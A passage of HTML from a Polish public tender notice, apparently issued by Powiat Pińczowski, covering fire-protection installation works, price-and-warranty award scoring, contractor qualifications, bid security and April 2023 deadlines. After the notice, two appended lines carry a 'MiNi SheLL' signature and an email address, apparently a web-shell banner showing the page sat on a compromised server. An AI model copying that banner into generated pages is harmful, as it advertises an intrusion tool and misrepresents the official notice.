Maszyny, aparatura, urządzenia i wyroby elektryczne; oświetlenie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich wagami (1% - 1 pkt)<br/>2.	Cena 60% maksymalnie 60% (=60 punktów) według wzoru : c= cena najtańszej oferty brutto spośród ofert nie podlegających odrzuceniu / cena badanej (przeliczanej) oferty brutto x 60<br/>Uwaga: Zgodnie z art. 225 ustawy Pzp, jeśli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004r. o podatku od towarów i usług (Dz.U. z 2022. poz. 931 z dnia 2022.04.09) dla celów zastosowania kryterium cena Zamawiający dolicza do przedstawionej ceny kwotę podatku od towarów i usług którą miałby obowiązek rozliczyć.<br/>3.	W kryterium „rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy” za każdy dodatkowe dwa lata gwarancji zostaną odpowiednio doliczone punkty:<br/><br/>a.	36 m-cy : 0 punktów (spełnienie warunku)<br/>b.	48 m- cy: 20 punktów<br/>c.	72 m - cy: 40 punktów<br/>UWAGA: W przypadku braku wskazania przez Wykonawcę gwarancji i rękojmi przyjmuje się minimalne okresy i przyznaje „0” punktów.<br/>W przypadku wskazania dłuższego niż 72 m-ce okresu gwarancji - 40 pkt.=40%<br/>4.	Oferta najkorzystniejszą zostaje oferta, która uzyska w sumie najwyższą liczbę punktów w ramach powyższych kryteriów<br/>5.	Zamawiający uzna za najkorzystniejszą ofertę wykonawcy, która uzyska największą łączną liczbę punktów. Łączna ilość punktów dla każdej nie odrzuconej oferty zostanie obliczona według poniższego wzoru:<br/>S=C+G<br/>S – suma punktów oferty<br/>C – liczba punktów oferty uzyskana w kryterium „cena”<br/>G – liczba punktów uzyskana w kryterium „rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy”<br/>6.	Liczba punktów, którą można uzyskać w kryterium cena zostanie obliczona wg wzoru:<br/>C = (Cmin ÷ Cx) x 60%<br/>Gdzie:<br/>C – ilość punktów przyznana ocenianej ofercie w ramach kryterium cena za realizację zamówienia<br/>Cmin – najniższa cena brutto zaoferowana w ofertach<br/>Cx – cena brutto oferty ocenianej<br/>7.	Liczba punktów, którą można uzyskać w kryterium rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy zostanie obliczona według wzoru:<br/>G = (Gbad ÷ Gx) x 40%<br/>Gdzie:<br/>G – ilość punktów przyznana ocenianej ofercie w ramach kryterium rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy<br/>Gbad – okres gwarancji i rękojmi na przedmiot umowy zaoferowany w ofercie badanej<br/>Gx – najdłuższy zaoferowany okres gwarancji i rękojmi na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rozszerzenie okresu gwarancji i rekojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie obejmuje zaprojektowanie i wykonanie instalacji systemu przeciwpożarowego w budynku Domu Pomocy Społecznej, instalacji przyzywowej, wymiany drzwi wewnętrznych na przeciwpożarowe, zgodnie z obowiązującymi przepisami przeciwpożarowymi. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 760185,19 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45343000-3 - Roboty instalacyjne przeciwpożarowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">79930000-2 - Specjalne usługi projektowe</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich wagami (1% - 1 pkt)<br/>2.	Cena 60% maksymalnie 60% (=60 punktów) według wzoru : c= cena najtańszej oferty brutto spośród ofert nie podlegających odrzuceniu / cena badanej (przeliczanej) oferty brutto x 60<br/>Uwaga: Zgodnie z art. 225 ustawy Pzp, jeśli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004r. o podatku od towarów i usług (Dz.U. z 2022. poz. 931 z dnia 2022.04.09) dla celów zastosowania kryterium cena Zamawiający dolicza do przedstawionej ceny kwotę podatku od towarów i usług którą miałby obowiązek rozliczyć.<br/>3.	W kryterium „rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy” za każdy dodatkowe dwa lata gwarancji zostaną odpowiednio doliczone punkty:<br/><br/>a.	36 m-cy : 0 punktów (spełnienie warunku)<br/>b.	48 m- cy: 20 punktów<br/>c.	72 m - cy: 40 punktów<br/>UWAGA: W przypadku braku wskazania przez Wykonawcę gwarancji i rękojmi przyjmuje się minimalne okresy i przyznaje „0” punktów.<br/>W przypadku wskazania dłuższego niż 72 m-ce okresu gwarancji - 40 pkt.=40%<br/>4.	Oferta najkorzystniejszą zostaje oferta, która uzyska w sumie najwyższą liczbę punktów w ramach powyższych kryteriów<br/>5.	Zamawiający uzna za najkorzystniejszą ofertę wykonawcy, która uzyska największą łączną liczbę punktów. Łączna ilość punktów dla każdej nie odrzuconej oferty zostanie obliczona według poniższego wzoru:<br/>S=C+G<br/>S – suma punktów oferty<br/>C – liczba punktów oferty uzyskana w kryterium „cena”<br/>G – liczba punktów uzyskana w kryterium „rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy”<br/>6.	Liczba punktów, którą można uzyskać w kryterium cena zostanie obliczona wg wzoru:<br/>C = (Cmin ÷ Cx) x 60%<br/>Gdzie:<br/>C – ilość punktów przyznana ocenianej ofercie w ramach kryterium cena za realizację zamówienia<br/>Cmin – najniższa cena brutto zaoferowana w ofertach<br/>Cx – cena brutto oferty ocenianej<br/>7.	Liczba punktów, którą można uzyskać w kryterium rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy zostanie obliczona według wzoru:<br/>G = (Gbad ÷ Gx) x 40%<br/>Gdzie:<br/>G – ilość punktów przyznana ocenianej ofercie w ramach kryterium rozszerzenie okresu gwarancji i rękojmi na przedmiot umowy<br/>Gbad – okres gwarancji i rękojmi na przedmiot umowy zaoferowany w ofercie badanej<br/>Gx – najdłuższy zaoferowany okres gwarancji i rękojmi na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rozszerzenie okresu gwarancji i rekojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>2. zdolność techniczna lub zawodowa w zakresie doświadczenia (Uwaga: doświadczenie Wykonawcy zostanie uznane, gdy wykaże on roboty zakończone):<br/>2.1.	dla części 1:<br/>a)	wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej 1 zamówienie na prace demontażowe, rozbiórkowe na kwotę min. 20 tys. zł.<br/>2.2.	dla części 2:<br/>a)	wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej 2 zamówienia na prace przy wymianie lub montażu nowej windy na kwotę min. 100 tys. zł. każde<br/>2.3.	dla części 3:<br/>a)	wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej 2 zamówienia na prace o podobnym charakterze na budynkach użyteczności publicznej lub/i zamieszkania zbiorowego zawierające montaż paneli fotowoltaicznych , modernizację lub wykonanie nowej instalacji c.o. i termomodernizację, każde o wartości min. 300 tys. zł.<br/>b)	wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej 2 zamówienia na prace o podobnym charakterze na budynkach użyteczności publicznej lub/i zamieszkania zbiorowego zawierające montaż pomp ciepła, magazynów energii, prac instalacyjnych elektrycznych i hydraulicznych, każde o wartości min 80 tys. zł.<br/>2.4.	dla części 4:<br/>a)	wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej 3 zamówienia na prace o podobnym charakterze na budynkach użyteczności publicznej lub/i zamieszkania zbiorowego zawierające instalacje sygnalizacji przeciw pożarowej każde o wartości min. 50 tys. zł.<br/>3. zdolność techniczna lub zawodowa w zakresie osób zdolnych do realizacji zamówienia Zamawiający wymaga:<br/>3.1.	dla części 3 aby Wykonawca wykazał, że dysponuje lub będzie dysponował co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej (osoba ta będzie pełnić funkcję kierownika budowy). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">7.	W celu wykazania braku podstaw do wykluczenia - chodzi o następujące dokumenty, wskazane w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415):<br/>a)	Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem - jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b)	Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego - zawarte w Załączniku nr 5 do SWZ, sporządzonym w oparciu o postanowienia § 2 i § 3 ww. rozporządzenia.<br/><br/>zamawiający żąda również podmiotowych środków dowodowych, o których mowa w art. 125 ust. 1 ustawy Pzp na potwierdzenie braku podstaw wykluczenia i spełniania warunków udziału w postępowaniu (wzór oświadczenia Załącznik nr 3 do SWZ),</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.1.	W celu potwierdzenia przez Wykonawcę spełnienia warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej - chodzi o następujące dokumenty, wskazane w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415):<br/>1)	wykazu robót zgodnie z rozdzialem VIII pkt. 1 ppkt.1.4. niniejszej SWZ – wzór zał. nr 8 do SWZ<br/>2)	wykazu osób zdolnych do realizacji zamówienia zgodnie z rozdziałem VIII pkt.1 ppkt. 1.5. niniejszej SWZ – wzór Zał. Nr 9 do SWZ<br/>3)	Oświadczenie Wykonawcy o przynależności/braku przynależności do tej samej grupy kapitałowej<br/><br/>zamawiający żąda również podmiotowych środków dowodowych, o których mowa w art. 125 ust. 1 ustawy Pzp na potwierdzenie braku podstaw wykluczenia i spełniania warunków udziału w postępowaniu (wzór oświadczenia Załącznik nr 3 do SWZ),</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)	wykazu robót zgodnie z rozdzialem VIII pkt. 1 ppkt.1.4. niniejszej SWZ – wzór zał. nr 8 do SWZ<br/>2)	wykazu osób zdolnych do realizacji zamówienia zgodnie z rozdziałem VIII pkt.1 ppkt. 1.5. niniejszej SWZ – wzór Zał. Nr 9 do SWZ<br/>3)	Oświadczenie Wykonawcy o przynależności/braku przynależności do tej samej grupy kapitałowej – Załącznik nr 10 do SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	wykazu robót zgodnie z rozdzialem VIII pkt. 1 ppkt.1.4. niniejszej SWZ – wzór zał. nr 8 do SWZ<br/>2)	wykazu osób zdolnych do realizacji zamówienia zgodnie z rozdziałem VIII pkt.1 ppkt. 1.5. niniejszej SWZ – wzór Zał. Nr 9 do SWZ<br/>3)	Oświadczenie Wykonawcy o przynależności/braku przynależności do tej samej grupy kapitałowej – Załącznik nr 10 do SWZ <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> OŚWIADCZENIE WYKONAWCY o AKTUALNOŚCI <br/>informacji składanych w oświadczeniu <br/>o którym mowa w art. 125 ust. 1 ustawy PZP <br/><br/>OŚWIADCZENIE WYKONAWCY o AKTUALNOŚCI <br/>informacji składanych w oświadczeniu <br/>o którym mowa w art. 125 ust. 1 ustawy PZP <br/><br/>ZOBOWIĄZANIE INNEGO PODMIOTU <br/>do oddania do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia<br/>składane na podstawie art. 118 ust. 3 ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Nie dopuszcza się składania wadium w innej walucie niż PLN.<br/>w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wadium (w każdej z dopuszczalnych form) może być wniesione przez jednego, kilku lub wszystkich Wykonawców, pod warunkiem, iż łączna wysokość wniesionego wadium odpowiadać będzie wymaganej kwocie. W takim przypadku składając wadium należy wskazać w imieniu kogo i tytułem jakiego postępowania jest wnoszone.<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/><br/>Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462 z dnia 2023.03.10).<br/><br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej (art. 97 ust. 10 ustawy Pzp).<br/>Gwarancję i poręczenia należy wystawić na Powiat Pińczowski<br/>Z treści gwarancji, poręczenia winno wynikać nieodwołalne i bezwarunkowe, płatne na pierwsze pisemne żądanie zgłoszone przez Zamawiającego oraz być wykonalne na terytorium Rzeczypospolitej Polskiej - zobowiązanie gwaranta, poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w przepisie art. 98 ust. 6 ustawy Pzp.<br/>Zgodnie z rodz. X SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Każdy Wykonawca (lub podmioty występujące wspólnie) może złożyć tylko jedną ofertę.<br/>Złożenie przez jednego Wykonawcę lub podmioty występujące wspólnie, więcej niż jednej oferty (lub oferty zawierającej niedopuszczone rozwiązania wariantowe) - spowoduje jej odrzucenie jako niezgodnej z przepisami ustawy Pzp (art. 226 ust. 1 pkt 3 ustawy Pzp).<br/>Wykonawcy wspólnie składający ofertę składają	Oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp (dotyczy sytuacji, z której wynika wykonanie przedmiotu zamówienia przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia) - Załącznik nr 6 do SWZ, - jeśli dotyczy.<br/>Ofertę i inne wymagane do złożenia wraz z nią oświadczenia i dokumenty powinna być podpisana przez ustanowionego Pełnomocnika - w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia (Konsorcjum/ spółka cywilna).<br/><br/>W przypadku, gdy zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.<br/><br/>dla podmiotów występujących wspólnie należy uzupełnić 6.	Oświadczenie w trybie art. 117 ust 4 - zał nr 6 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści umowy stanowią zał. nr 4 do niniejszej SWZ<br/>2.	W przypadku zawierania umowy wyłącznie w formie elektronicznej datą zawarcia umowy jest data złożenia ostatniego podpisu na umowie<br/>3.	Zamawiający przewiduje możliwość zmian umowy, określonych w projektowanych postanowieniach umowy oraz wynikających z postanowień przepisów art.454 i art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-03 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-03 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-02</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com